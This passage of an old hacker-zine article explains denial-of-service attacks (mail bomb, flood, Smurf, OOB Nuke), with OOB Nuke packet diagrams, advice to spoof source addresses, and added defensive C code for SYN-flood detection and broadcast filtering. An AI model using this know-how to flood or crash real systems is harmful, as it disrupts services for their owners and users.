 known among the common folk as "Nukes", has entered our lives. Here I will
 try to explain what kind of animal this is.

     Contents:
       1. Overview

       2. The Attacks
          2.1. Indirect Attacks
               2.1.1. Mail Bomb
               2.1.2. Flood
               2.1.3. Smurf

          2.2. Direct Attacks
               2.2.1. OOB Nuke
               2.2.2. 1. Teardrop
               2.2.2. 2. Newtear
               2.2.2. 3. Syndrop
               2.2.3. Land
               2.2.4. Bonk
               2.2.5. Nestea
               2.2.6. Kiss of Death
               2.2.7. Linux 2.2 DoS attack

       3. Source Codes
          - winnuke.c
          - papasmurf.c
          - teardrop.c
          - newtear.c
          - land.c
          - latierra.c
          - nestea.c
          - nestea2.c
          - bonk.c
          - kod.c
          - kox.c
          - l22dos.cpp


     1. Overview
     -----------

 So, what is a DoS attack? Well, it is an attack that prevents one or more
 machines from doing what they are meant to do. In this article I will
 concentrate specifically on DoS attacks over the Internet.

 There are two kinds of DoS attacks - direct and indirect. Direct ones act
 directly on the victim - for example, crashing the machine by exploiting
 bugs in the operating system, or causing an error in a given application,
 which stops a given service (for example, triggering some exception in the
 httpd daemon so that the web server cannot do its job).

 Indirect Denial of Service attacks do not act directly on the machine but
 affect other factors, thereby interfering with its work. An example is the
 so-called "flood" - overloading ("flooding") the external links of a given
 server/network, which keeps normal requests from being served in time and
 leads to timeouts.

 The history of DoS attacks is quite interesting. Such attacks have always
 existed, but lately (after 1997) new ones started being discovered at a
 frightening pace. Apparently the badly written fragments of the source code
 of some operating systems are now starting to come to light.

 Some DoS attacks are written specifically for a particular operating
 system. One such attack is "OOB Nuke", also known as WinNuke. Other attacks
 crash almost everything. That is because most operating systems (mainly the
 UNIXes, but this holds for Windows too) use the BSD networking source code
 directly, with almost no changes, so the bugs (or rather the oversights)
 were spread along with it.

 Some DoS attacks send invalid packets, counting on an oversight or a lack
 of forethought in the code of the operating system they attack (for example
 Land, Teardrop, etc). Others, like OOB Nuke or Kiss of Death, send
 perfectly normal data, which nevertheless triggers an error. The
 interesting part is that both OOB Nuke and Kiss of Death are aimed at
 Windows ;-) ;-)

 But it is not only operating system code that contains bugs and oversights.
 The people who write DoS attack programs make mistakes too, and in some
 cases reading their nonsense makes you want to shoot yourself (as is the
 case with syndrop.c).

 Finally, I want to note that DoS attacks are very hard to trace. Not in the
 sense that it is hard to filter the invalid packets, but that it is hard to
 trace where they come from, since the packets used usually have a forged
 source address (so-called spoofed packets, from spoof - to deceive). For
 some attacks (for example Land or Smurf) this is simply mandatory, since
 they are built on it (unless you want to screw up your own computer) ;-)

 Packets are easiest to spoof if you have a UNIX system, because on UNIX the
 system administrator's programs (those with root privileges) have the right
 to open so-called "raw sockets", i.e. to build the whole IP (or whatever)
 packet themselves, header included (the only exception is the IP checksum,
 which is always filled in by the kernel).

 On Windows things are quite different. Since it has no privileges, a user
 is just a user, and Microsoft evidently did not want to allow its customers
 such liberties. So to send spoofed packets from Windows you have to bypass
 Winsock somehow, or write your own, or I don't know what, since I have no
 experience writing winsock programs.

 The only program I have seen handle spoofing under Windows successfully is
 Agressor Exploit Generator. It sends a whole PPP frame straight to the
 modem, bypassing the entire networking part of Windows. Unfortunately, as
 you can guess, it works only over a modem PPP connection. If you use a
 local network or another kind of link, you cannot use it, but for home use
 it will do ;-)

 A rumour reached me that some guy had the idea of writing raw sockets that
 would work under both 95 and NT, using fully documented functions (some IP
 socket chains or something like that; Star Gruhtar tried to explain it to
 me, but he did not know either). I sincerely wish him success!

 So, the advantages and flexibility of UNIX when working with networks
 explain why DoS attacks are made mostly from UNIX programs. That is also
 why the sources attached to this article are for UNIX.

     2. The Attacks
     --------------

 By the way they affect the victim, attacks can be divided into two types -
 global, i.e. ones that keep the whole machine from doing its job, and local
 - ones that interfere with a particular application (for example ICQ-Nukes
 and so on). Since we obviously cannot look at every single application
 separately (my time is limited, after all), here I will deal specifically
 with the global attacks.

 Here are some of the better-known DoS attacks, to give you an idea of how
 exactly such things get discovered and what they are. I have tried to keep
 the chronological order so that you can see how their discovery unfolded,
 but since it is impossible both to follow the chronology and to group them
 by topic, here is the sequence in which the DoS attacks discussed here came
 out:

   +------------------------------------------------------------------+
   |OOB Nuke                                                7-May-1997|
   |Smurf                                                  28-Jul-1997|
   |Teardrop                                                3-Nov-1997|
   |Land                                                   20-Nov-1997|
   |Newtear                                                 8-Jan-1998|
   |Syndrop (it is worthless anyway)                         -   -1998|
   |Nestea                                                 16-Apr-1998|
   |Bonk                                                    1-May-1998|
   |Kiss of Death (all I know is that it was brand new)      -   -1999|
   |Linux 2.2 DoS                                           1-Jun-1999|
   +------------------------------------------------------------------+

     2.1. Indirect Attacks
     ---------------------

 As I mentioned, indirect attacks affect the attacked machine indirectly.
 Clogging the server's entire external link, crashing the main and backup
 routers - whatever of that kind you come up with, it will be an indirect
 attack.

 It is clear that there are many such attacks. Here we will still mention
 the three main ones - mail bomb, flood and smurf.

     2.1.1. Mail Bomb
     ----------------


              +-------------------------------------------------+
              |                                                 |
              |      Downloading Message 1 of 100,000,000...    |
              |      __________________________________         |
              |     |__________________________________|        |
              |                                                 |
              +-------------------------------------------------+

                (credits for the picture - the KaBoom! readme)

 A mail bomb is the overloading of a given server (or just an e-mail
 mailbox) with a huge quantity of e-mails. If the victim is just one e-mail
 address, the person's problem will be telling the important mail from the
 junk. Imagine finding 100000 e-mails one morning... A nasty trick. The
 solution is usually deleting the whole mailbox, which is rather unpleasant.

 Separately, the whole server can get into trouble too, for example if you
 fill up its disk with e-mails, or if the e-mails simply arrive faster than
 the capacity of its link (for example, arriving faster than 2 Mbps).

 It is an interesting question whether the mail bomb should be classified as
 a direct or an indirect attack. In most cases it is direct because, in the
 end, we are attacking one specific user. The widely available programs for
 the purpose - the so-called mail bombers - help with that too.

 Most mail bombers are written for Windows 95, with the idea that the masses
 will use them. That, however, is suitable only for attacking particular
 people. Think how much data you can send (or download) in one evening with
 your miserable little modem. And now think how you would fill the server's
 disk with that, or clog its external links. Out of the question.

 Clogging the server's external links, however, is definitely an indirect
 attack. True, we are attacking the given machine quite deliberately, but
 the problems are not caused by the fact that what arrives is e-mail, but by
 the fact that a lot of data arrives. Besides, this way the whole network
 can have problems, not just the particular server. Remember what happened
 recently with the Tyrnovo providers.

 I will not describe here how a mail bomb is made. There is enough material
 on the subject. All sorts of mail bombers are widely distributed (everybody
 has heard of the best ones - Unabomber, KaBoom! and so on).

 Separately, if you want something more serious, you can look at Phreedom
 17, the article "What the Fuck Happened in Tyrnovo?" by Bad Sector. There
 is also an article on the subject in Phreedom 9 - "Creating a Mail Bomb",
 written by Star Gruhtar. The current issue should also contain material by
 Star Gruhtar on sending large quantities of e-mail (I mean his article from
 Phreedom Con'99, in which he must at the very least have touched on the
 subject).

     2.1.2. Flood
     ------------

 The word is meant literally. As a DoS attack a flood is exactly that -
 flooding the outgoing (or at least the incoming) links of a given network
 with a huge quantity of data.

 This is usually done from a machine with a terribly fast connection, and
 the most common way is sending ICMP Echo Request packets (to put it plainly
 - pings). On UNIX the ping command even lets the superuser use the -f
 option - sending pings as fast as they come back, or 100 times per second,
 whichever is faster. Still, it is advisable not to send pings larger than a
 few kilobytes, because such pings get filtered.

 Another option besides pings is half-open TCP connections. SYN (start of
 connection) packets are sent, immediately followed by an end of connection.

 A flood can of course be made with any kind of packets, but the advantage
 of ICMP Echo Request and of half-open TCP connections is that they oblige
 the victim to reply. That is, not only will the packets arrive quite fast,
 but the attacked machine will also answer them, which loads it even more.
 Recently, as far as I remember (Feb '99), something like this hit the
 network of our beloved (by necessity) telephone operator - BTK ;-)

 I hardly need to mention that it is a good idea for the source address to
 be spoofed.
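
 Seen from the receiving server, the half-open connections described above
 show up as SYNs that are never followed by the final ACK. The tracker below
 is an added example, not part of the original article or its attached
 sources; the trace, the table size and the thresholds are constructed
 assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define TH_SYN 0x02
#define TH_RST 0x04
#define TH_ACK 0x10
#define MAX_PENDING 64          /* assumed size of the tracking table */

#define IP4(a, b, c, d) \
    (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | ((uint32_t)(c) << 8) | (uint32_t)(d))

/* One client-to-server TCP segment as seen on the protected port. */
struct event { uint32_t t_ms, src; uint16_t sport; uint8_t flags; };
struct stats { unsigned completed, aborted, timed_out, pending_at_end, peak_pending; };

/* CONSTRUCTED trace: three normal handshakes (SYN, then ACK) and seven SYNs
 * from documentation-range addresses that are reset or simply abandoned. */
static const struct event TRACE[] = {
    {    0, IP4(192, 0, 2, 10),  1025, TH_SYN },
    {   40, IP4(192, 0, 2, 10),  1025, TH_ACK },
    {  100, IP4(192, 0, 2, 20),  1030, TH_SYN },
    {  150, IP4(192, 0, 2, 20),  1030, TH_ACK },
    { 1000, IP4(203, 0, 113, 1), 2000, TH_SYN },
    { 1001, IP4(203, 0, 113, 1), 2000, TH_RST },
    { 1002, IP4(203, 0, 113, 2), 2001, TH_SYN },
    { 1003, IP4(203, 0, 113, 2), 2001, TH_RST },
    { 1004, IP4(203, 0, 113, 3), 2002, TH_SYN },
    { 1005, IP4(203, 0, 113, 4), 2003, TH_SYN },
    { 1006, IP4(203, 0, 113, 5), 2004, TH_SYN },
    { 1007, IP4(203, 0, 113, 6), 2005, TH_SYN },
    { 1008, IP4(203, 0, 113, 7), 2006, TH_SYN },
    { 5000, IP4(192, 0, 2, 10),  1026, TH_SYN },
    { 5030, IP4(192, 0, 2, 10),  1026, TH_ACK },
};
#define N_TRACE (sizeof TRACE / sizeof TRACE[0])

/* Follow every handshake by (source address, source port). Counting is done
 * in aggregate, not per source, because spoofed sources are all different. */
struct stats track_handshakes(const struct event *ev, size_t n, uint32_t timeout_ms)
{
    struct { uint32_t t_ms, src; uint16_t sport; int used; } tab[MAX_PENDING] = {{0}};
    struct stats st = {0};
    unsigned pending = 0;

    for (size_t i = 0; i < n; i++) {
        int hit = -1, spare = -1;
        for (int k = 0; k < MAX_PENDING; k++) {
            if (tab[k].used && ev[i].t_ms - tab[k].t_ms > timeout_ms) {
                tab[k].used = 0;            /* SYN that was never followed up */
                pending--;
                st.timed_out++;
            }
            if (tab[k].used && tab[k].src == ev[i].src && tab[k].sport == ev[i].sport)
                hit = k;
            else if (!tab[k].used && spare < 0)
                spare = k;
        }
        if (ev[i].flags == TH_SYN) {
            /* New handshake; a retransmitted SYN or a full table is ignored. */
            if (hit < 0 && spare >= 0) {
                tab[spare].t_ms = ev[i].t_ms;
                tab[spare].src = ev[i].src;
                tab[spare].sport = ev[i].sport;
                tab[spare].used = 1;
                if (++pending > st.peak_pending)
                    st.peak_pending = pending;
            }
        } else if (hit >= 0 && (ev[i].flags & (TH_RST | TH_ACK))) {
            if (ev[i].flags & TH_RST)
                st.aborted++;               /* SYN followed by end of connection */
            else
                st.completed++;             /* final ACK of a real handshake */
            tab[hit].used = 0;
            pending--;
        }
    }
    st.pending_at_end = pending;
    return st;
}

/* Assumed rule: at least 5 handshakes that went nowhere, and more of them
 * than handshakes that completed. */
int syn_flood_suspected(const struct stats *s)
{
    unsigned incomplete = s->aborted + s->timed_out + s->pending_at_end;
    return incomplete >= 5 && incomplete > s->completed;
}

int main(void)
{
    struct stats st = track_handshakes(TRACE, N_TRACE, 3000);
    printf("completed=%u aborted=%u timed_out=%u peak_pending=%u suspected=%d\n",
           st.completed, st.aborted, st.timed_out, st.peak_pending,
           syn_flood_suspected(&st));
    return 0;
}
```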

     2.1.3. Smurf
     ------------

 Smurf is a special case of the flood described above. The idea is actually
 extremely simple. It relies on so-called broadcast addresses.

 A broadcast address is an address that a whole given network listens on. A
 packet received on that address is processed by all devices on the network
 (or at least by those that support or are configured with a broadcast
 address). Usually this is an address ending in 0. Although the ones ending
 in 255 are considered multicast, there are cases where broadcasts are set
 up that way too.

 For example, if we have a broadcast address like 193.15.42.0, a packet sent
 to it concerns all machines in the network 193.15.42.0. If the network has,
 say, 50 machines that react to broadcast, then when we send a ping to that
 address we will receive 50 replies. That is, the network acts as a packet
 multiplier.

 Now imagine you have a biiiig network from which you get, say, 1 million
 replies. Sending a 1K packet to its broadcast address means receiving a
 million one-kilobyte packets - that is 1 GB of traffic.

 And now imagine you start pinging that network with spoofed packets, in the
 name of a chosen unfortunate. You send a kilobyte out, no big deal, and the
 unfortunate starts receiving a gigabyte of data. Well, they may stop it
 fairly quickly (big networks usually have quite qualified staff constantly
 watching for problems - a monster like that cannot afford outages), but
 that will not prevent you from knocking a given server off the net.

 And imagine how fat a line that network must have in order to have a
 million hosts answering broadcast. Hundreds of megabits, even gigabits.
 Quite enough to cut off not a server but all of Bulgaria from the net.

 Well, Smurf does exactly that. It sends spoofed ICMP packets to a broadcast
 address. papasmurf.c (released a year after the original smurf.c) can also
 send UDP packets, and optionally both kinds.

 Lists of big broadcasts can also be found around the net. I will not give
 you addresses here, though, because it is not good for many people to have
 them, you understand.
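
 Both halves of Smurf, the forged source address and the broadcast
 destination, can be refused at the border of a network. The filter below is
 an added example, not part of the original article or its attached sources;
 193.15.42.0/24 is the article's sample network, while the /26 subnet and
 the outside addresses are constructed. It goes slightly beyond the text by
 also checking the all-ones host address and subnets that do not end on an
 octet boundary.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Host-order IPv4 address from its four dotted-quad parts. */
#define IP4(a, b, c, d) \
    (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | ((uint32_t)(c) << 8) | (uint32_t)(d))

struct prefix { uint32_t net; int len; };

enum verdict { PASS = 0, DROP_DIRECTED_BROADCAST, DROP_SPOOFED_SOURCE };

/* Networks behind this border router (assumed configuration). */
static const struct prefix LOCAL_NETS[] = {
    { IP4(193, 15, 42, 0), 24 },    /* the article's example network */
    { IP4(10, 1, 2, 64),   26 },    /* constructed, not octet-aligned */
};
#define N_LOCAL (sizeof LOCAL_NETS / sizeof LOCAL_NETS[0])

static uint32_t mask_of(int len)
{
    return len == 0 ? 0 : 0xFFFFFFFFu << (32 - len);
}

static int in_prefix(uint32_t addr, const struct prefix *p)
{
    return (addr & mask_of(p->len)) == (p->net & mask_of(p->len));
}

static int is_local(uint32_t addr)
{
    for (size_t i = 0; i < N_LOCAL; i++)
        if (in_prefix(addr, &LOCAL_NETS[i]))
            return 1;
    return 0;
}

/* True when addr is the all-zeros host address of a local network (the form
 * the article uses, the old BSD convention) or its all-ones host address. */
int is_directed_broadcast(uint32_t addr)
{
    for (size_t i = 0; i < N_LOCAL; i++) {
        const struct prefix *p = &LOCAL_NETS[i];
        uint32_t host = ~mask_of(p->len);
        if (p->len < 31 && in_prefix(addr, p) &&
            ((addr & host) == 0 || (addr & host) == host))
            return 1;
    }
    return 0;
}

/* Packet arriving from outside. The protocol is deliberately not examined,
 * so ICMP and UDP directed broadcasts are refused alike. */
enum verdict ingress(uint32_t src, uint32_t dst)
{
    if (is_directed_broadcast(dst))
        return DROP_DIRECTED_BROADCAST;   /* we would become the multiplier */
    if (is_local(src))
        return DROP_SPOOFED_SOURCE;       /* outside packet, inside source */
    return PASS;
}

/* Packet leaving the network: its source must be one of our own addresses. */
enum verdict egress(uint32_t src)
{
    return is_local(src) ? PASS : DROP_SPOOFED_SOURCE;
}

int main(void)
{
    uint32_t outside = IP4(198, 51, 100, 7);   /* constructed outside host */
    printf("in  -> 193.15.42.0   : %d\n", ingress(outside, IP4(193, 15, 42, 0)));
    printf("in  -> 10.1.2.127    : %d\n", ingress(outside, IP4(10, 1, 2, 127)));
    printf("in  -> 193.15.42.17  : %d\n", ingress(outside, IP4(193, 15, 42, 17)));
    printf("out <- 198.51.100.7  : %d\n", egress(outside));
    return 0;
}
```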

     2.2. Direct Attacks
     -------------------

 Direct DoS attacks are more common than indirect ones (much more common,
 actually), because they are more or less predictable and aimed at one
 single, specific target. Here are some of them (since the diagrams make the
 text hard to read, I have tried to put clear markers for start and end):

     2.2.1. OOB Nuke
     ---------------

 OOB Nuke, also known as WinNuke, is perhaps one of the oldest DoS attacks.
 By and large it started the era of remote Denial of Service attacks over
 the net. Created at the beginning of '97 (7-May-1997) and aimed
 specifically at Windows 95 machines, it was a real hit among the IRC
 maniacs of the time as a rather successful means of dealing with those who
 dared to be more insolent than them ;-)

 OOB Nuke is based on the fact that Windows 95 has problems interpreting
 so-called OOB (Out Of Band) data (I have not tried it on Win 3.x, I do not
 know whether it works). Out Of Band data is the data the Urgent Pointer in
 the TCP header points to. It is not part of the data in the packet, but
 something different. When such data arrives for an application, only a flag
 is raised on the socket so that the application knows such data is waiting,
 but it has to request the data from the operating system itself and decide
 for itself how to handle it.

 So, if Windows 95 receives OOB data, it does not know how to handle it and
 gets confused. OOB Nuke is normally done on port 139 (the NetBIOS Session
 Service port). This port is chosen because it is usually open on Windows
 95.

 Sending an OOB Nuke leads to the infamous blue screen reading something
 like "EXCEPTION I-don't-know-what IN MODULE VNETBIOS.VXD", after which the
 system has to be restarted before it can have a normal connection again.

 The fix is a bit dubious - VNETBIOS.VXD must not be loaded. That can be
 done either by renaming VNETBIOS.VXD, which however produces an error
 message at system startup, or by disabling NetBIOS from the Control Panel.

 There is hardly a machine left that is susceptible to OOB Nuke. And it has
 one significant drawback - it requires establishing a TCP connection, which
 does not allow spoofing the source address.

 Here is what OOB Nuke consists of (note that the diagram format follows the
 RFC, i.e. the bits are numbered left to right, so Version 4 and IHL 5 is a
 byte containing 0x45):

   Packet #1 (SYN):

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            3C      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       00              20      |  DF |     00          00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       40      |   06 = TCP    | (filled by kernel)   3C 9A    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                         Source Address                        |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   TCP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     Source Port (at test)     |       Destination Port        |
     |       04              02      |         00            8B      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                       Sequence Number                         |
     |       FE              1D                EE            D8      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                    Acknowledgement Number                     |
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Offset | (reserved)|   Flags   |          Window               |
     |   A   |     0     |    SYN    |         79            60      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Checksum               |      Urgent Pointer           |
     |       76              3D      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data:

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       02              04                0F            2C      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       04              02                08            0A      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              39                5F            32      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              00                00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       01              03                03            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
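
 Packet #1 above, read back from its bytes: the decoder below is an added
 example, not part of the original article or its attached sources. It
 checks the IP header checksum shown in the diagram and flags the one thing
 a filter in front of a Windows 95 machine would look for, a TCP segment
 with URG set going to port 139. PACKET1 is copied from the diagram;
 URG_SAMPLE is constructed, with its TCP checksum left at zero and not
 verified.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define TH_SYN 0x02
#define TH_PSH 0x08
#define TH_ACK 0x10
#define TH_URG 0x20

struct seg {
    unsigned version, ihl_bytes, total_len, protocol;
    unsigned sport, dport, tcp_hdr_bytes, flags, urg_ptr;
    int df, ip_csum_ok;
};

/* Packet #1 from the article: 20-byte IP header, 20-byte TCP header and the
 * 20 bytes the diagram lists after the TCP header. */
static const uint8_t PACKET1[] = {
    0x45,0x00,0x00,0x3C, 0x00,0x20,0x40,0x00, 0x40,0x06,0x3C,0x9A,
    0x7F,0x00,0x00,0x01, 0x7F,0x00,0x00,0x01,
    0x04,0x02,0x00,0x8B, 0xFE,0x1D,0xEE,0xD8, 0x00,0x00,0x00,0x00,
    0xA0,0x02,0x79,0x60, 0x76,0x3D,0x00,0x00,
    0x02,0x04,0x0F,0x2C, 0x04,0x02,0x08,0x0A, 0x00,0x39,0x5F,0x32,
    0x00,0x00,0x00,0x00, 0x01,0x03,0x03,0x00,
};

/* CONSTRUCTED sample (not from the article): same loopback endpoints, flags
 * URG+ACK+PSH, urgent pointer 1, one data byte, TCP checksum left at zero. */
static const uint8_t URG_SAMPLE[] = {
    0x45,0x00,0x00,0x29, 0x00,0x23,0x40,0x00, 0x40,0x06,0x3C,0xAA,
    0x7F,0x00,0x00,0x01, 0x7F,0x00,0x00,0x01,
    0x04,0x02,0x00,0x8B, 0xFE,0x1D,0xEE,0xD9, 0xFE,0x2F,0x2F,0x9B,
    0x50,0x38,0x79,0x60, 0x00,0x00,0x00,0x01,
    0x78,
};

static unsigned be16(const uint8_t *p)
{
    return (unsigned)p[0] << 8 | p[1];
}

/* One's-complement sum over the header, checksum field included, must fold
 * to 0xFFFF when the checksum is correct. */
static int ip_checksum_ok(const uint8_t *h, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += be16(h + i);
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);
    return sum == 0xFFFF;
}

/* Decode an IPv4 packet carrying TCP. Returns 0 on success, -1 when the
 * buffer is truncated, malformed or not TCP. */
int parse_ipv4_tcp(const uint8_t *b, size_t n, struct seg *s)
{
    if (n < 20)
        return -1;
    s->version = b[0] >> 4;               /* high nibble of 0x45 */
    s->ihl_bytes = (b[0] & 0x0F) * 4u;    /* low nibble, in 32-bit words */
    if (s->version != 4 || s->ihl_bytes < 20 || n < s->ihl_bytes)
        return -1;
    s->total_len = be16(b + 2);
    s->df = (b[6] & 0x40) != 0;
    s->protocol = b[9];
    s->ip_csum_ok = ip_checksum_ok(b, s->ihl_bytes);
    if (s->protocol != 6 || n < s->ihl_bytes + 20)
        return -1;

    const uint8_t *t = b + s->ihl_bytes;
    s->sport = be16(t);
    s->dport = be16(t + 2);
    s->tcp_hdr_bytes = (t[12] >> 4) * 4u; /* "Offset" field of the diagram */
    s->flags = t[13] & 0x3F;
    s->urg_ptr = be16(t + 18);
    if (s->tcp_hdr_bytes < 20 || n < s->ihl_bytes + s->tcp_hdr_bytes)
        return -1;
    return 0;
}

/* The pattern the text describes: urgent (OOB) data sent to NetBIOS. */
int is_oob_to_netbios(const struct seg *s)
{
    return s->dport == 139 && (s->flags & TH_URG) != 0;
}

int main(void)
{
    struct seg s;
    if (parse_ipv4_tcp(PACKET1, sizeof PACKET1, &s) == 0)
        printf("packet #1:   %u -> %u flags=0x%02X csum_ok=%d oob139=%d\n",
               s.sport, s.dport, s.flags, s.ip_csum_ok, is_oob_to_netbios(&s));
    if (parse_ipv4_tcp(URG_SAMPLE, sizeof URG_SAMPLE, &s) == 0)
        printf("constructed: %u -> %u flags=0x%02X csum_ok=%d oob139=%d\n",
               s.sport, s.dport, s.flags, s.ip_csum_ok, is_oob_to_netbios(&s));
    return 0;
}
```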

   Received Packet (SYN+ACK):

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            3C      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       00              21      |  DF |     00          00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |      TTL      |   Protocol    |       Header Checksum         |
     |       40      |   06 = TCP    | (filled by kernel)   3C 99    |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                         Source Address                        |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |           Destination address (at test = localhost)           |
     |       7F              00                00            01      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   TCP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |          Source Port          |       Destination Port        |
     |       00              8B      |         04            02      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                       Sequence Number                         |
     |       FE              2F                2F            9A      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                    Acknowledgement Number                     |
     |       FE              1D                EE            D9      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Offset | (reserved)|   Flags   |          Window               |
     |   A   |     0     |  SYN+ACK  |         79            60      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Checksum               |      Urgent Pointer           |
     |       E8              F6      |         00            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Data:

     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       02              04                0F            2C      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       04              02                08            0A      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              39                5F            32      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       00              39                5F            32      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |       01              03                03            00      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   Packet #2:

   IP Header:

                          1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |Version|  IHL  |      TOS      |         Total Length          |
     |   4   |   5   |       00      |         00            34      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |        Identification         |Flags|    Fragment Offset      |
     |       00              22      |  DF |     00          00      |
